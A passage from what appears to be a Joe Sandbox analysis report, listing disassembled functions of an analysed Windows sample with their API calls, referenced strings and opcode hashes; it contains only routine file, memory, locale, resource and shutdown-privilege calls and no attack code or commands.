Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Function 00405280 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F

Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9

Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98

Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428

Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676

Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F

Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,01F57FF4,0040AA59,00000000), ref: 004076B3

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666

Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519

Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B

Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction Fuzzy Hash:

Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00407558

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D

Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

Non-executed Functions

Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00409457
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3

Strings

SeShutdownPrivilege, xrefs: 0040946F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F

Function 00409C34 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E

Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1

Strings

GetUserDefaultUILanguage, xrefs: 00407043
.DEFAULT\Control Panel\International, xrefs: 00407078
Control Panel\Desktop\ResourceLocale, xrefs: 004070B0
kernel32.dll, xrefs: 00407048
Locale, xrefs: 00407090

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

